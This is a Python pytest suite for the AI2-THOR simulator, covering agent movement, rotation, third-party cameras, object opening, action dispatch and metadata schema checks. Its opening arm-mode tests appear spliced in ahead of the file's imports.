event = controller.step(action="MoveAgent", ahead=0.25, right=0.15)
assert_near(
point1={"x": -1.649999976158142, "y": 0.9009982347488403, "z": -1.75},
point2=event.metadata["agent"]["position"],
)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_manipulathor_rotate(controller):
event = controller.reset(scene="FloorPlan28", agentMode="arm")
assert_near(
point1={"x": -0.0, "y": 180.0, "z": 0.0},
point2=event.metadata["agent"]["rotation"],
)
event = controller.step(action="RotateAgent", degrees=60)
assert_near(
point1={"x": -0.0, "y": 240.0, "z": 0.0},
point2=event.metadata["agent"]["rotation"],
)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_unsupported_manipulathor(controller):
controller.reset(agentMode="arm")
unsupported_actions = [
"MoveAhead",
"MoveBack",
"MoveLeft",
"MoveRight",
"RotateRight",
"RotateLeft",
]
for action in unsupported_actions:
event = controller.step(action)
assert not event, action + " should have failed with agentMode=arm"
event = controller.step(action="PickupObject", x=0.5, y=0.5)
assert not event, "PickupObject(x, y) should have failed with agentMode=arm"
objectId = next(
obj["objectId"] for obj in event.metadata["objects"] if obj["pickupable"]
)
event = controller.step(action="PickupObject", objectId=objectId, forceAction=True)
assert not event, "PickupObject(objectId) should have failed with agentMode=arm"
| # import pytest
import os
import string
import random
import copy
import json
import pytest
import warnings
import jsonschema
import numpy as np
from ai2thor.controller import Controller
from ai2thor.tests.constants import TESTS_DATA_DIR
from ai2thor.wsgi_server import WsgiServer
from ai2thor.fifo_server import FifoServer
from PIL import ImageChops, ImageFilter, Image
import glob
import re
TEST_SCENE = "FloorPlan28"
# Defining const classes to lessen the possibility of a misspelled key
class Actions:
AddThirdPartyCamera = "AddThirdPartyCamera"
UpdateThirdPartyCamera = "UpdateThirdPartyCamera"
class MultiAgentMetadata:
thirdPartyCameras = "thirdPartyCameras"
class ThirdPartyCameraMetadata:
position = "position"
rotation = "rotation"
fieldOfView = "fieldOfView"
def build_controller(**args):
default_args = dict(scene=TEST_SCENE, local_build=True)
default_args.update(args)
# during a ci-build we will get a warning that we are using a commit_id for the
# build instead of 'local'
with warnings.catch_warnings():
warnings.simplefilter("ignore")
c = Controller(**default_args)
# used for resetting
c._original_initialization_parameters = c.initialization_parameters
return c
_wsgi_controller = build_controller(server_class=WsgiServer)
_fifo_controller = build_controller(server_class=FifoServer)
_stochastic_controller = build_controller(agentControllerType="stochastic")
def skip_reset(controller):
# setting attribute on the last event so we can tell if the
# controller gets used since last event will change after each step
controller.last_event._pytest_skip_reset = True
# resetting on each use so that each tests works with
# the scene in a pristine state
def reset_controller(controller):
controller.initialization_parameters = copy.deepcopy(
controller._original_initialization_parameters
)
if not hasattr(controller.last_event, "_pytest_skip_reset"):
controller.reset(TEST_SCENE)
skip_reset(controller)
return controller
@pytest.fixture
def wsgi_controller():
return reset_controller(_wsgi_controller)
@pytest.fixture
def stochastic_controller():
return reset_controller(_stochastic_controller)
@pytest.fixture
def fifo_controller():
return reset_controller(_fifo_controller)
fifo_wsgi = [_fifo_controller, _wsgi_controller]
fifo_wsgi_stoch = [_fifo_controller, _wsgi_controller, _stochastic_controller]
BASE_FP28_POSITION = dict(x=-1.5, z=-1.5, y=0.901,)
BASE_FP28_LOCATION = dict(
**BASE_FP28_POSITION, rotation={"x": 0, "y": 0, "z": 0}, horizon=0, standing=True,
)
def teleport_to_base_location(controller: Controller):
assert (
controller.last_event.metadata["sceneName"].replace("_physics", "")
== TEST_SCENE
)
controller.step("TeleportFull", **BASE_FP28_LOCATION)
assert controller.last_event.metadata["lastActionSuccess"]
def setup_function(function):
for c in [_fifo_controller, _wsgi_controller, _stochastic_controller]:
reset_controller(c)
def teardown_module(module):
_wsgi_controller.stop()
_fifo_controller.stop()
_stochastic_controller.stop()
def assert_near(point1, point2, error_message=""):
assert point1.keys() == point2.keys(), error_message + "Keys mismatch."
for k in point1.keys():
assert abs(point1[k] - point2[k]) < 1e-3, (
error_message + f"for {k} key, {point1[k]} != {point2[k]}"
)
def test_stochastic_controller(stochastic_controller):
stochastic_controller.reset(TEST_SCENE)
assert stochastic_controller.last_event.metadata["lastActionSuccess"]
# Issue #514 found that the thirdPartyCamera image code was causing multi-agents to end
# up with the same frame
def test_multi_agent_with_third_party_camera(fifo_controller):
fifo_controller.reset(TEST_SCENE, agentCount=2)
assert not np.all(
fifo_controller.last_event.events[1].frame
== fifo_controller.last_event.events[0].frame
)
event = fifo_controller.step(
dict(
action="AddThirdPartyCamera",
rotation=dict(x=0, y=0, z=90),
position=dict(x=-1.0, z=-2.0, y=1.0),
)
)
assert not np.all(
fifo_controller.last_event.events[1].frame
== fifo_controller.last_event.events[0].frame
)
# Issue #526 thirdPartyCamera hanging without correct keys in FifoServer FormMap
def test_third_party_camera_with_image_synthesis(fifo_controller):
fifo_controller.reset(
TEST_SCENE,
renderInstanceSegmentation=True,
renderDepthImage=True,
renderSemanticSegmentation=True,
)
event = fifo_controller.step(
dict(
action="AddThirdPartyCamera",
rotation=dict(x=0, y=0, z=90),
position=dict(x=-1.0, z=-2.0, y=1.0),
)
)
assert len(event.third_party_depth_frames) == 1
assert len(event.third_party_semantic_segmentation_frames) == 1
assert len(event.third_party_camera_frames) == 1
assert len(event.third_party_instance_segmentation_frames) == 1
def test_rectangle_aspect(fifo_controller):
fifo_controller.reset(TEST_SCENE, width=600, height=300)
event = fifo_controller.step(dict(action="Initialize", gridSize=0.25))
assert event.frame.shape == (300, 600, 3)
def test_small_aspect(fifo_controller):
fifo_controller.reset(TEST_SCENE, width=128, height=64)
event = fifo_controller.step(dict(action="Initialize", gridSize=0.25))
assert event.frame.shape == (64, 128, 3)
def test_bot_deprecation(fifo_controller):
fifo_controller.reset(TEST_SCENE, agentMode="bot")
assert (
fifo_controller.initialization_parameters["agentMode"].lower() == "locobot"
), "bot should alias to locobot!"
def test_deprecated_segmentation_params(fifo_controller):
# renderObjectImage has been renamed to renderInstanceSegmentation
# renderClassImage has been renamed to renderSemanticSegmentation
fifo_controller.reset(
TEST_SCENE, renderObjectImage=True, renderClassImage=True,
)
event = fifo_controller.last_event
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=DeprecationWarning)
assert event.class_segmentation_frame is event.semantic_segmentation_frame
assert event.semantic_segmentation_frame is not None
assert (
event.instance_segmentation_frame is not None
), "renderObjectImage should still render instance_segmentation_frame"
def test_deprecated_segmentation_params2(fifo_controller):
# renderObjectImage has been renamed to renderInstanceSegmentation
# renderClassImage has been renamed to renderSemanticSegmentation
fifo_controller.reset(
TEST_SCENE, renderSemanticSegmentation=True, renderInstanceSegmentation=True,
)
event = fifo_controller.last_event
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=DeprecationWarning)
assert event.class_segmentation_frame is event.semantic_segmentation_frame
assert event.semantic_segmentation_frame is not None
assert (
event.instance_segmentation_frame is not None
), "renderObjectImage should still render instance_segmentation_frame"
def test_reset(fifo_controller):
width = 520
height = 310
event = fifo_controller.reset(
scene=TEST_SCENE, width=width, height=height, renderDepthImage=True
)
assert event.frame.shape == (height, width, 3), "RGB frame dimensions are wrong!"
assert event.depth_frame is not None, "depth frame should have rendered!"
assert event.depth_frame.shape == (
height,
width,
), "depth frame dimensions are wrong!"
width = 300
height = 300
event = fifo_controller.reset(
scene=TEST_SCENE, width=width, height=height, renderDepthImage=False
)
assert event.depth_frame is None, "depth frame shouldn't have rendered!"
assert event.frame.shape == (height, width, 3), "RGB frame dimensions are wrong!"
def test_fast_emit(fifo_controller):
event = fifo_controller.step(dict(action="RotateRight"))
event_fast_emit = fifo_controller.step(dict(action="TestFastEmit", rvalue="foo"))
event_no_fast_emit = fifo_controller.step(dict(action="LookUp"))
event_no_fast_emit_2 = fifo_controller.step(dict(action="RotateRight"))
assert event.metadata._raw_metadata["actionReturn"] is None
assert event_fast_emit.metadata._raw_metadata["actionReturn"] == "foo"
assert id(event.metadata._raw_metadata["objects"]) == id(
event_fast_emit.metadata._raw_metadata["objects"]
)
assert id(event.metadata._raw_metadata["objects"]) != id(
event_no_fast_emit.metadata._raw_metadata["objects"]
)
assert id(event_no_fast_emit_2.metadata._raw_metadata["objects"]) != id(
event_no_fast_emit.metadata._raw_metadata["objects"]
)
def test_fifo_large_input(fifo_controller):
random_string = "".join(
random.choice(string.ascii_letters) for i in range(1024 * 16)
)
event = fifo_controller.step(
dict(action="TestActionReflectParam", rvalue=random_string)
)
assert event.metadata["actionReturn"] == random_string
def test_fast_emit_disabled(fifo_controller):
slow_controller = fifo_controller
slow_controller.reset(TEST_SCENE, fastActionEmit=False)
event = slow_controller.step(dict(action="RotateRight"))
event_fast_emit = slow_controller.step(dict(action="TestFastEmit", rvalue="foo"))
# assert that when actionFastEmit is off that the objects are different
assert id(event.metadata["objects"]) != id(event_fast_emit.metadata["objects"])
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_lookdown(controller):
e = controller.step(dict(action="RotateLook", rotation=0, horizon=0))
position = controller.last_event.metadata["agent"]["position"]
horizon = controller.last_event.metadata["agent"]["cameraHorizon"]
assert horizon == 0.0
e = controller.step(dict(action="LookDown"))
assert e.metadata["agent"]["position"] == position
assert round(e.metadata["agent"]["cameraHorizon"]) == 30
assert e.metadata["agent"]["rotation"] == dict(x=0, y=0, z=0)
e = controller.step(dict(action="LookDown"))
assert round(e.metadata["agent"]["cameraHorizon"]) == 60
e = controller.step(dict(action="LookDown"))
assert round(e.metadata["agent"]["cameraHorizon"]) == 60
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_no_leak_params(controller):
action = dict(action="RotateLook", rotation=0, horizon=0)
e = controller.step(action)
assert "sequenceId" not in action
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_target_invocation_exception(controller):
# TargetInvocationException is raised when short circuiting failures occur
# on the Unity side. It often occurs when invalid arguments are used.
event = controller.step("OpenObject", x=1.5, y=0.5)
assert not event.metadata["lastActionSuccess"], "OpenObject(x > 1) should fail."
assert event.metadata[
"errorMessage"
], "errorMessage should not be empty when OpenObject(x > 1)."
@pytest.mark.parametrize("controller", fifo_wsgi_stoch)
def test_lookup(controller):
e = controller.step(dict(action="RotateLook", rotation=0, horizon=0))
position = controller.last_event.metadata["agent"]["position"]
horizon = controller.last_event.metadata["agent"]["cameraHorizon"]
assert horizon == 0.0
e = controller.step(dict(action="LookUp"))
assert e.metadata["agent"]["position"] == position
assert e.metadata["agent"]["cameraHorizon"] == -30.0
assert e.metadata["agent"]["rotation"] == dict(x=0, y=0, z=0)
e = controller.step(dict(action="LookUp"))
assert e.metadata["agent"]["cameraHorizon"] == -30.0
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_rotate_left(controller):
e = controller.step(dict(action="RotateLook", rotation=0, horizon=0))
position = controller.last_event.metadata["agent"]["position"]
rotation = controller.last_event.metadata["agent"]["rotation"]
assert rotation == dict(x=0, y=0, z=0)
horizon = controller.last_event.metadata["agent"]["cameraHorizon"]
e = controller.step(dict(action="RotateLeft"))
assert e.metadata["agent"]["position"] == position
assert e.metadata["agent"]["cameraHorizon"] == horizon
assert e.metadata["agent"]["rotation"]["y"] == 270.0
assert e.metadata["agent"]["rotation"]["x"] == 0.0
assert e.metadata["agent"]["rotation"]["z"] == 0.0
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_simobj_filter(controller):
objects = controller.last_event.metadata["objects"]
unfiltered_object_ids = sorted([o["objectId"] for o in objects])
filter_object_ids = sorted([o["objectId"] for o in objects[0:3]])
e = controller.step(dict(action="SetObjectFilter", objectIds=filter_object_ids))
assert len(e.metadata["objects"]) == len(filter_object_ids)
filtered_object_ids = sorted([o["objectId"] for o in e.metadata["objects"]])
assert filtered_object_ids == filter_object_ids
e = controller.step(dict(action="SetObjectFilter", objectIds=[]))
assert len(e.metadata["objects"]) == 0
e = controller.step(dict(action="ResetObjectFilter"))
reset_filtered_object_ids = sorted([o["objectId"] for o in e.metadata["objects"]])
assert unfiltered_object_ids == reset_filtered_object_ids
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_add_third_party_camera(controller):
expectedPosition = dict(x=1.2, y=2.3, z=3.4)
expectedRotation = dict(x=30, y=40, z=50)
expectedFieldOfView = 45.0
assert (
len(controller.last_event.metadata[MultiAgentMetadata.thirdPartyCameras]) == 0
), "there should be 0 cameras"
e = controller.step(
dict(
action=Actions.AddThirdPartyCamera,
position=expectedPosition,
rotation=expectedRotation,
fieldOfView=expectedFieldOfView,
)
)
assert (
len(e.metadata[MultiAgentMetadata.thirdPartyCameras]) == 1
), "there should be 1 camera"
camera = e.metadata[MultiAgentMetadata.thirdPartyCameras][0]
assert_near(
camera[ThirdPartyCameraMetadata.position],
expectedPosition,
"initial position should have been set",
)
assert_near(
camera[ThirdPartyCameraMetadata.rotation],
expectedRotation,
"initial rotation should have been set",
)
assert (
camera[ThirdPartyCameraMetadata.fieldOfView] == expectedFieldOfView
), "initial fieldOfView should have been set"
# expects position to be a Vector3, should fail!
event = controller.step(
action="AddThirdPartyCamera", position=5, rotation=dict(x=0, y=0, z=0)
)
assert not event.metadata[
"lastActionSuccess"
], "position should not allow float input!"
# orthographicSize expects float, not Vector3!
error_message = None
try:
event = controller.step(
action="AddThirdPartyCamera",
position=dict(x=0, y=0, z=0),
rotation=dict(x=0, y=0, z=0),
orthographic=True,
orthographicSize=dict(x=0, y=0, z=0),
)
except ValueError as e:
error_message = str(e)
assert error_message.startswith(
"action: AddThirdPartyCamera has an invalid argument: orthographicSize"
)
def test_update_third_party_camera(fifo_controller):
# add a new camera
expectedPosition = dict(x=1.2, y=2.3, z=3.4)
expectedRotation = dict(x=30, y=40, z=50)
expectedFieldOfView = 45.0
e = fifo_controller.step(
dict(
action=Actions.AddThirdPartyCamera,
position=expectedPosition,
rotation=expectedRotation,
fieldOfView=expectedFieldOfView,
)
)
assert (
len(fifo_controller.last_event.metadata[MultiAgentMetadata.thirdPartyCameras])
== 1
), "there should be 1 camera"
# update camera pose fully
expectedPosition = dict(x=2.2, y=3.3, z=4.4)
expectedRotation = dict(x=10, y=20, z=30)
expectedInitialFieldOfView = 45.0
e = fifo_controller.step(
dict(
action=Actions.UpdateThirdPartyCamera,
thirdPartyCameraId=0,
position=expectedPosition,
rotation=expectedRotation,
)
)
camera = e.metadata[MultiAgentMetadata.thirdPartyCameras][0]
assert_near(
camera[ThirdPartyCameraMetadata.position],
expectedPosition,
"position should have been updated",
)
assert_near(
camera[ThirdPartyCameraMetadata.rotation],
expectedRotation,
"rotation should have been updated",
)
assert (
camera[ThirdPartyCameraMetadata.fieldOfView] == expectedInitialFieldOfView
), "fieldOfView should not have changed"
# partially update the camera pose
changeFOV = 55.0
expectedPosition2 = dict(x=3.2, z=5)
expectedRotation2 = dict(y=90)
e = fifo_controller.step(
action=Actions.UpdateThirdPartyCamera,
thirdPartyCameraId=0,
fieldOfView=changeFOV,
position=expectedPosition2,
rotation=expectedRotation2,
)
camera = e.metadata[MultiAgentMetadata.thirdPartyCameras][0]
assert (
camera[ThirdPartyCameraMetadata.fieldOfView] == changeFOV
), "fieldOfView should have been updated"
expectedPosition.update(expectedPosition2)
expectedRotation.update(expectedRotation2)
assert_near(
camera[ThirdPartyCameraMetadata.position],
expectedPosition,
"position should been slightly updated",
)
assert_near(
camera[ThirdPartyCameraMetadata.rotation],
expectedRotation,
"rotation should been slightly updated",
)
for fov in [-1, 181, 0]:
e = fifo_controller.step(
dict(
action=Actions.UpdateThirdPartyCamera,
thirdPartyCameraId=0,
fieldOfView=fov,
)
)
assert not e.metadata[
"lastActionSuccess"
], "fieldOfView should fail outside of (0, 180)"
assert_near(
camera[ThirdPartyCameraMetadata.position],
expectedPosition,
"position should not have updated",
)
assert_near(
camera[ThirdPartyCameraMetadata.rotation],
expectedRotation,
"rotation should not have updated",
)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_rotate_look(controller):
e = controller.step(dict(action="RotateLook", rotation=0, horizon=0))
position = controller.last_event.metadata["agent"]["position"]
rotation = controller.last_event.metadata["agent"]["rotation"]
assert rotation == dict(x=0, y=0, z=0)
e = controller.step(dict(action="RotateLook", rotation=90, horizon=31))
assert e.metadata["agent"]["position"] == position
assert int(e.metadata["agent"]["cameraHorizon"]) == 31
assert e.metadata["agent"]["rotation"]["y"] == 90.0
assert e.metadata["agent"]["rotation"]["x"] == 0.0
assert e.metadata["agent"]["rotation"]["z"] == 0.0
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_rotate_right(controller):
e = controller.step(dict(action="RotateLook", rotation=0, horizon=0))
position = controller.last_event.metadata["agent"]["position"]
rotation = controller.last_event.metadata["agent"]["rotation"]
assert rotation == dict(x=0, y=0, z=0)
horizon = controller.last_event.metadata["agent"]["cameraHorizon"]
e = controller.step(dict(action="RotateRight"))
assert e.metadata["agent"]["position"] == position
assert e.metadata["agent"]["cameraHorizon"] == horizon
assert e.metadata["agent"]["rotation"]["y"] == 90.0
assert e.metadata["agent"]["rotation"]["x"] == 0.0
assert e.metadata["agent"]["rotation"]["z"] == 0.0
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_open_aabb_cache(controller):
objects = controller.last_event.metadata["objects"]
obj = next(obj for obj in objects if obj["objectType"] == "Fridge")
start_aabb = obj["axisAlignedBoundingBox"]
open_event = controller.step(
action="OpenObject",
objectId=obj["objectId"],
forceAction=True,
raise_for_failure=True,
)
obj = next(
obj for obj in open_event.metadata["objects"] if obj["objectType"] == "Fridge"
)
open_aabb = obj["axisAlignedBoundingBox"]
assert start_aabb["size"] != open_aabb["size"]
close_event = controller.step(
action="CloseObject",
objectId=obj["objectId"],
forceAction=True,
raise_for_failure=True,
)
obj = next(
obj for obj in close_event.metadata["objects"] if obj["objectType"] == "Fridge"
)
close_aabb = obj["axisAlignedBoundingBox"]
assert start_aabb["size"] == close_aabb["size"]
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_open_interactable_with_filter(controller):
position = {"x": -1.0, "y": 0.9009982347488403, "z": -0.5}
action = position.copy()
action["rotation"] = dict(y=90)
action["horizon"] = 0
action["standing"] = True
action["action"] = "TeleportFull"
controller.step(action, raise_for_failure=True)
fridge = next(
obj
for obj in controller.last_event.metadata["objects"]
if obj["objectType"] == "Fridge"
)
assert fridge["visible"], "Object is not interactable!"
assert_near(controller.last_event.metadata["agent"]["position"], position)
controller.step(dict(action="SetObjectFilter", objectIds=[]))
assert controller.last_event.metadata["objects"] == []
controller.step(
action="OpenObject", objectId=fridge["objectId"], raise_for_failure=True,
)
controller.step(dict(action="ResetObjectFilter", objectIds=[]))
fridge = next(
obj
for obj in controller.last_event.metadata["objects"]
if obj["objectType"] == "Fridge"
)
assert fridge["isOpen"]
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_open_interactable(controller):
position = {"x": -1.0, "y": 0.9009982347488403, "z": -0.5}
action = position.copy()
action["rotation"] = dict(y=90)
action["horizon"] = 0
action["standing"] = True
action["action"] = "TeleportFull"
controller.step(action, raise_for_failure=True)
fridge = next(
obj
for obj in controller.last_event.metadata["objects"]
if obj["objectType"] == "Fridge"
)
assert fridge["visible"], "Object is not interactable!"
assert_near(controller.last_event.metadata["agent"]["position"], position)
event = controller.step(
action="OpenObject", objectId=fridge["objectId"], raise_for_failure=True,
)
fridge = next(
obj
for obj in controller.last_event.metadata["objects"]
if obj["objectType"] == "Fridge"
)
assert fridge["isOpen"]
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_open(controller):
objects = controller.last_event.metadata["objects"]
obj_to_open = next(obj for obj in objects if obj["objectType"] == "Fridge")
# helper that returns obj_to_open from a new event
def get_object(event, object_id):
return next(
obj for obj in event.metadata["objects"] if obj["objectId"] == object_id
)
for openness in [0.5, 0.7, 0]:
event = controller.step(
action="OpenObject",
objectId=obj_to_open["objectId"],
openness=openness,
forceAction=True,
raise_for_failure=True,
)
opened_obj = get_object(event, obj_to_open["objectId"])
assert abs(opened_obj["openness"] - openness) < 1e-3, "Incorrect openness!"
assert opened_obj["isOpen"] == (openness != 0), "isOpen incorrectly reported!"
# test bad openness values
for bad_openness in [-0.5, 1.5]:
event = controller.step(
action="OpenObject",
objectId=obj_to_open["objectId"],
openness=bad_openness,
forceAction=True,
)
assert not event.metadata[
"lastActionSuccess"
], "0.0 > Openness > 1.0 should fail!"
# test backwards compatibility on moveMagnitude, where moveMagnitude
# is now `openness`, but when moveMagnitude = 0 that corresponds to openness = 1.
event = controller.step(
action="OpenObject",
objectId=obj_to_open["objectId"],
forceAction=True,
moveMagnitude=0,
)
opened_obj = get_object(event, obj_to_open["objectId"])
assert (
abs(opened_obj["openness"] - 1) < 1e-3
), "moveMagnitude=0 must have openness=1"
assert opened_obj["isOpen"], "moveMagnitude isOpen incorrectly reported!"
# another moveMagnitude check
test_openness = 0.65
event = controller.step(
action="OpenObject",
objectId=obj_to_open["objectId"],
forceAction=True,
moveMagnitude=test_openness,
)
opened_obj = get_object(event, obj_to_open["objectId"])
assert (
abs(opened_obj["openness"] - test_openness) < 1e-3
), "moveMagnitude is not working!"
assert opened_obj["isOpen"], "moveMagnitude isOpen incorrectly reported!"
# a CloseObject specific check
event = controller.step(
action="CloseObject", objectId=obj_to_open["objectId"], forceAction=True
)
obj = get_object(event, obj_to_open["objectId"])
assert abs(obj["openness"] - 0) < 1e-3, "CloseObject openness should be 0"
assert not obj["isOpen"], "CloseObject should report isOpen==false!"
def test_action_dispatch(fifo_controller):
controller = fifo_controller
event = controller.step(
dict(action="TestActionDispatchFindAmbiguous"),
typeName="UnityStandardAssets.Characters.FirstPerson.PhysicsRemoteFPSAgentController",
)
known_ambig = sorted(
[
"TestActionDispatchSAAmbig",
"TestActionDispatchSAAmbig2",
"ProcessControlCommand",
]
)
assert sorted(event.metadata["actionReturn"]) == known_ambig
skip_reset(fifo_controller)
def test_action_dispatch_find_ambiguous_stochastic(fifo_controller):
event = fifo_controller.step(
dict(action="TestActionDispatchFindAmbiguous"),
typeName="UnityStandardAssets.Characters.FirstPerson.StochasticRemoteFPSAgentController",
)
known_ambig = sorted(
[
"TestActionDispatchSAAmbig",
"TestActionDispatchSAAmbig2",
"ProcessControlCommand",
]
)
assert sorted(event.metadata["actionReturn"]) == known_ambig
skip_reset(fifo_controller)
def test_action_dispatch_server_action_ambiguous2(fifo_controller):
exception_thrown = False
exception_message = None
try:
fifo_controller.step("TestActionDispatchSAAmbig2")
except ValueError as e:
exception_thrown = True
exception_message = str(e)
assert exception_thrown
assert (
"Ambiguous action: TestActionDispatchSAAmbig2 Signature match found in the same class"
== exception_message
)
skip_reset(fifo_controller)
def test_action_dispatch_server_action_ambiguous(fifo_controller):
exception_thrown = False
exception_message = None
try:
fifo_controller.step("TestActionDispatchSAAmbig")
except ValueError as e:
exception_thrown = True
exception_message = str(e)
assert exception_thrown
assert (
exception_message
== "Ambiguous action: TestActionDispatchSAAmbig Mixing a ServerAction method with overloaded methods is not permitted"
)
skip_reset(fifo_controller)
def test_action_dispatch_find_conflicts_stochastic(fifo_controller):
event = fifo_controller.step(
dict(action="TestActionDispatchFindConflicts"),
typeName="UnityStandardAssets.Characters.FirstPerson.StochasticRemoteFPSAgentController",
)
known_conflicts = {
"TestActionDispatchConflict": ["param22"],
}
assert event.metadata["actionReturn"] == known_conflicts
skip_reset(fifo_controller)
def test_action_dispatch_find_conflicts_physics(fifo_controller):
event = fifo_controller.step(
dict(action="TestActionDispatchFindConflicts"),
typeName="UnityStandardAssets.Characters.FirstPerson.PhysicsRemoteFPSAgentController",
)
known_conflicts = {
"TestActionDispatchConflict": ["param22"],
}
assert event.metadata._raw_metadata["actionReturn"] == known_conflicts
skip_reset(fifo_controller)
def test_action_dispatch_missing_args(fifo_controller):
caught_exception = False
try:
event = fifo_controller.step(
dict(action="TestActionDispatchNoop", param6="foo")
)
print(event.metadata["actionReturn"])
except ValueError as e:
caught_exception = True
assert caught_exception
assert fifo_controller.last_event.metadata["errorCode"] == "MissingArguments"
skip_reset(fifo_controller)
def test_action_dispatch_invalid_action(fifo_controller):
caught_exception = False
try:
event = fifo_controller.step(dict(action="TestActionDispatchNoopFoo"))
except ValueError as e:
caught_exception = True
assert caught_exception
assert fifo_controller.last_event.metadata["errorCode"] == "InvalidAction"
skip_reset(fifo_controller)
def test_action_dispatch_empty(fifo_controller):
event = fifo_controller.step(dict(action="TestActionDispatchNoop"))
assert event.metadata["actionReturn"] == "emptyargs"
skip_reset(fifo_controller)
def test_action_disptatch_one_param(fifo_controller):
event = fifo_controller.step(dict(action="TestActionDispatchNoop", param1=True))
assert event.metadata["actionReturn"] == "param1"
skip_reset(fifo_controller)
def test_action_disptatch_two_param(fifo_controller):
event = fifo_controller.step(
dict(action="TestActionDispatchNoop", param1=True, param2=False)
)
assert event.metadata["actionReturn"] == "param1 param2"
skip_reset(fifo_controller)
def test_action_disptatch_two_param_with_default(fifo_controller):
event = fifo_controller.step(
dict(action="TestActionDispatchNoop2", param3=True, param4="foobar")
)
assert event.metadata["actionReturn"] == "param3 param4/default foobar"
skip_reset(fifo_controller)
def test_action_disptatch_two_param_with_default_empty(fifo_controller):
event = fifo_controller.step(dict(action="TestActionDispatchNoop2", param3=True))
assert event.metadata["actionReturn"] == "param3 param4/default foo"
skip_reset(fifo_controller)
def test_action_disptatch_serveraction_default(fifo_controller):
event = fifo_controller.step(dict(action="TestActionDispatchNoopServerAction"))
assert event.metadata["actionReturn"] == "serveraction"
skip_reset(fifo_controller)
def test_action_disptatch_serveraction_with_object_id(fifo_controller):
event = fifo_controller.step(
dict(action="TestActionDispatchNoopServerAction", objectId="candle|1|2|3")
)
assert event.metadata["actionReturn"] == "serveraction"
skip_reset(fifo_controller)
def test_action_disptatch_all_default(fifo_controller):
event = fifo_controller.step(dict(action="TestActionDispatchNoopAllDefault"))
assert event.metadata["actionReturn"] == "alldefault"
skip_reset(fifo_controller)
def test_action_disptatch_some_default(fifo_controller):
event = fifo_controller.step(
dict(action="TestActionDispatchNoopAllDefault2", param12=9.0)
)
assert event.metadata["actionReturn"] == "somedefault"
skip_reset(fifo_controller)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveahead(controller):
teleport_to_base_location(controller)
controller.step(dict(action="MoveAhead"), raise_for_failure=True)
position = controller.last_event.metadata["agent"]["position"]
assert_near(position, dict(x=-1.5, z=-1.25, y=0.901))
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveback(controller):
teleport_to_base_location(controller)
controller.step(dict(action="MoveBack"), raise_for_failure=True)
position = controller.last_event.metadata["agent"]["position"]
assert_near(position, dict(x=-1.5, z=-1.75, y=0.900998652))
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveleft(controller):
teleport_to_base_location(controller)
controller.step(dict(action="MoveLeft"), raise_for_failure=True)
position = controller.last_event.metadata["agent"]["position"]
assert_near(position, dict(x=-1.75, z=-1.5, y=0.901))
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveright(controller):
teleport_to_base_location(controller)
controller.step(dict(action="MoveRight"), raise_for_failure=True)
position = controller.last_event.metadata["agent"]["position"]
assert_near(position, dict(x=-1.25, z=-1.5, y=0.901))
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveahead_mag(controller):
teleport_to_base_location(controller)
controller.step(dict(action="MoveAhead", moveMagnitude=0.5), raise_for_failure=True)
position = controller.last_event.metadata["agent"]["position"]
assert_near(position, dict(x=-1.5, z=-1, y=0.9009983))
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_moveahead_fail(controller):
teleport_to_base_location(controller)
controller.step(dict(action="MoveAhead", moveMagnitude=5.0))
assert not controller.last_event.metadata["lastActionSuccess"]
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_jsonschema_metadata(controller):
event = controller.step(dict(action="Pass"))
with open(os.path.join(TESTS_DATA_DIR, "metadata-schema.json")) as f:
schema = json.loads(f.read())
jsonschema.validate(instance=event.metadata, schema=schema)
skip_reset(controller)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_arm_jsonschema_metadata(controller):
controller.reset(agentMode="arm")
event = controller.step(action="Pass")
with open(os.path.join(TESTS_DATA_DIR, "arm-metadata-schema.json")) as f:
schema = json.loads(f.read())
jsonschema.validate(instance=event.metadata, schema=schema)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_scenes_in_build(controller):
scenes = set()
for g in glob.glob("unity/Assets/Scenes/*.unity"):
scenes.add(os.path.splitext(os.path.basename(g))[0])
event = controller.step(dict(action="GetScenesInBuild"), raise_for_failure=True)
return_scenes = set(event.metadata["actionReturn"])
# not testing for private scenes
diff = scenes - return_scenes
assert len(diff) == 0, "scenes in build diff: %s" % diff
skip_reset(controller)
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_get_reachable_positions(controller):
event = controller.step("GetReachablePositions")
assert (
event.metadata["actionReturn"] == event.metadata["reachablePositions"]
), "reachablePositions should map to actionReturn!"
assert len(event.metadata["reachablePositions"]) > 0 and isinstance(
event.metadata["reachablePositions"], list
), "reachablePositions/actionReturn should not be empty after calling GetReachablePositions!"
assert "reachablePositions" not in event.metadata.keys()
event = controller.step("Pass")
try:
event.metadata["reachablePositions"]
assert (
False
), "reachablePositions shouldn't be available without calling action='GetReachablePositions'."
except:
pass
# Test for Issue: 477
def test_change_resolution_image_synthesis(fifo_controller):
fifo_controller.reset(
TEST_SCENE,
width=300,
height=300,
renderInstanceSegmentation=True,
renderDepthImage=True,
renderSemanticSegmentation=True,
)
fifo_controller.step("RotateRight")
first_event = fifo_controller.last_event
first_depth_frame = fifo_controller.last_event.depth_frame
first_instance_frame = fifo_controller.last_event.instance_segmentation_frame
first_sem_frame = fifo_controller.last_event.semantic_segmentation_frame
event = fifo_controller.step(action="ChangeResolution", x=500, y=500)
assert event.depth_frame.shape == (500, 500)
assert event.instance_segmentation_frame.shape == (500, 500, 3)
